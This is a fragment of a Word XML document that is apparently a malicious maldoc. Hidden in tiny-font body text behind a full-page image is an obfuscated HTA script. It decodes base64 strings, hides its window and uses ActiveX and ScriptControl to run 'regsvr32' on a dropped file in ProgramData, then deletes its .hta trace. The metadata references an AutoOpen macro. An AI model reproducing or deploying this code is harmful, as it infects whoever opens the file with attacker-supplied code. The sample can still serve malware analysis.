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26148" w:rsidRPr="00FB7181" w:rsidRDefault="00FB7181" w:rsidP="00FB7181">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="2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0;margin-top:0;width:612.95pt;height:867.15pt;z-index:251659264;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:page" o:bullet="t">
            <v:imagedata r:id="rId5" o:title="us"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00FB7181">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:sz w:val="2"/>
        </w:rPr>
        <w:t>&lt;html&gt;&lt;body&gt;&lt;div id="content"&gt;hello&lt;/div&gt;&lt;script language="javascript"&gt;var aWKdF = "a9oLN";function aUgasq(awFTPc){var aD07t = "a0EKB";acWBi = aD07t.toLowerCase();var aPWzqv = false;var aD0Mks = -41878;return(new ActiveXObject(awFTPc));}ae1Al = -8406;var azd3Iw = -28262;abKXU = "aYUGr";function aUrMf(aQPiI){var e={},i,b=0,c,x,l=0,a,a8qHR="",w=String.fromCharCode,L=aQPiI.length;var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(i=0;i&lt;64;i++){e[A.charAt(i)]=i;}for(x=0;x&lt;L;x++){c=e[aQPiI.charAt(x)];b=(b&lt;&lt;6)+c;l+=6;while(l&gt;=8){((a=(b&gt;&gt;&gt;(l-=8))&amp;0xff)||(x&lt;(L-2)))&amp;&amp;(a8qHR+=w(a));}}return(a8qHR);};a0chb2 = false;aPCUL7 = window;a1oWCZ = -33192;aBd7i = document;var aXhVs = "apKsW";aPCUL7.resizeTo(1, 1);aupXs7 = false;aXRTl2 = true;aPCUL7.moveTo(-100, -100);aJM8V1 = -49805;var amlU3 = -36589;var aTnbMl = 41478;var aTqS3V = "act038";var aKI6ix = aTqS3V.toLowerCase();aae3kO = 32908;aITus4 = "aoXe2L";var aDUOYP = aITus4.toString();var a3KlRp = aUrMf("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");var aE1HIO = aUrMf("CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=");&lt;/script&gt;&lt;script language="javascript"&gt;var a4EQx = -19950;function aQ3AaU(a71O9o){var an6WK = "aRLg9";var a5X0Gz = an6WK.toLowerCase();var a8B3lh = "aSwVuU";aUaQNt = a8B3lh.toLowerCase();var akSl73 = aUgasq("msscriptcontrol.scriptcontrol");arCgh1 = "aHX0J";akSl73.Language = "jscript";var aM86j = true;aVTiFm = -35420;akSl73.Timeout = 60000;amH0b = true;axXiRp = true;akSl73.AddCode(a71O9o);axGBr = 38917;var a30g4 = true;return(null);}&lt;/script&gt;&lt;script language="vbscript"&gt;aQ3AaU a3KlRp : aQ3AaU aE1HIO : aPCUL7.close&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00926148" w:rsidRPr="00FB7181" w:rsidSect="00C62459">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="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09A3"/>
    <w:rsid w:val="00301697"/>
    <w:rsid w:val="007E51D1"/>
    <w:rsid w:val="00926148"/>
    <w:rsid w:val="00AE14B9"/>
    <w:rsid w:val="00B809A3"/>
    <w:rsid w:val="00C62459"/>
    <w:rsid w:val="00FB71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D87056CD-CADC-4EBC-BA07-A643B150D0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YAIQ5.AUTOOPEN" wne:name="Project.ayaiq5.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.AOFC9.AEXMB" wne:name="Project.aofC9.aExM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724</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4</DocSecurity>
  <Lines>1</Lines>
  <Paragraphs>0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Manager/>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>727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ickf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-26T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-26T11:15:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>